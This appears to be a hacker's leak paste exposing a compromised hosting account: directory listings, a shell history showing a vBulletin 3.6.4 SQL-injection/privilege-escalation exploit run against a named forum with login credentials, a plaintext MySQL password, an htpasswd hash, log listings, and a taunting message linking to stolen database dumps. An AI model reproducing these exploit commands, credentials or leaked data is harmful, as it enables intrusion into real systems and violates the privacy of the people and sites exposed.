35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
nopasara@oss.bg [/home/nopasara/public_html]# ls -lia
total 2286196
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
nopasara@oss.bg [/home/nopasara/public_html/securityguy]# ls -lia
total 5722468
36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
nopasara@oss.bg [/home/nopasara]# cat .bash_history
#1263692240
cd public_html/
#1263692243
test.php
#1263692248
php test.php
#1263692260
php test.php <?php
#1263692260
print_r('
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
');
#1263692260
if ($argc<7) {
#1263692260
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
host: target server (ip/hostname)
path: path to vbulletin
user/pass: you need a moderator account
forumid: existing forum
postid: existing post
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
');
#1263692260
die;
#1263692260
}
#1263692260
/*
#1263692260
vulnerable code in inlinemod.php near lines 185-209:
#1263692260
...
#1263692260
#1263692260
->GPC['postids']);
#1263692260
dex => $postid)
#1263692260
dex"] != intval($postid))
{
unset($postids["$index"]);
}
}
if (empty($postids))
{
#1263692279
php test.php
#1263692305
php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
#1263692308
php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
#1263692321
php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
#1263692381
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692470
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692489
Administrator
#1263692493
Administrator
#1263692496
php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
#1263692539
cd ..
#1263692540
ls
#1263692547
rm .bash_history
#1263692551
cat .bash_h
#1263692557
exit
#1263831540
mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
#1263831932
mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
#1263833103
exit
#1263832465
ls -la
#1263832469
ls -la
#1263832491
vim .bash_history
#1263832552
mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
#1263832751
mysql --help|grep charset
#1263832754
mysql --help|grep char
#1263832908
cd public_html/
#1263832909
ls
#1263832912
cd sverdlov.net/
#1263832912
ls
#1263832923
vim wp-config.php
#1263837320
logou
#1263837322
logout
uname -a;w;id
cd /home/nopasara
ls -l
du -hs .
cd /home/nopasara
ls -lia
>> LOL, You're doing it wrong, idiot.
nopasara@oss.bg [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
leech:204VnKl0pmERM
nopasara@oss.bg [/home/nopasara]# ls -l docs
total 36044
drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
-rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
-rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
-rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
-rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
-rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
-rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
-rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
-rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
-rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
-rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
-rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
-rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
-rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
-rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
-rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
-rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
-rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
-rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
-rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
-rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
-rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
-rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
-rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
-rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
-rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
-rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
-rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
nopasara@oss.bg [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
total 128288
drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
-rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
-rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
-rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
-rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
-rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
-rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
-rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
-rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
-rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
-rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
-rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
-rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
-rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
-rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
-rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
-rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
-rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
-rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
-rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
-rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
-rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
-rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
-rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
-rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
-rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
-rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
-rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
-rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
-rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
-rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
-rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
-rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
-rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
>> Check the URL for database dumps, etc.
Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
Here's the URL for the various dumps -
http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
Get back to pr0n4all@hush.ai for non-published details, packet captures, some more database dumps, etc.